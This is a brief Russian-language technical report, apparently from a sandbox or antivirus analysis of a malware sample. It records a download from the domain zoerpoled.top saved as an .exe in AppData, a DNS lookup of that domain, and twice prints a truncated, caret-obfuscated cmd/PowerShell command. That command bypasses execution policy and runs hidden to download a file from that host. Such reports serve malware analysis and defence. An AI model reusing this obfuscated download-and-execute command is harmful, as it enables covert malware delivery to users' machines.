Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWEr^sHE^ll.^Ex^E -^e^x^eC^uT^I^onp^o^lI^c^y^ ^BYPA^sS ^-^no^Pro^fiLE -WiN^do^WsTylE^ hidDEN^ (Ne^w-^ob^Jec^T^ S^ystEm.^Ne^T.W^eBcl^I^EN^t^).DowN^LOa^dfi^lE('http://www.zoerp...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POWEr^sHE^ll.^Ex^E -^e^x^eC^uT^I^onp^o^lI^c^y^ ^BYPA^sS ^-^no^Pro^fiLE -WiN^do^WsTylE^ hidDEN^ (Ne^w-^ob^Jec^T^ S^ystEm.^Ne^T.W^eBcl^I^EN^t^).DowN^LOa^dfi^lE('http://www.zoerp...' (со скрытым окном)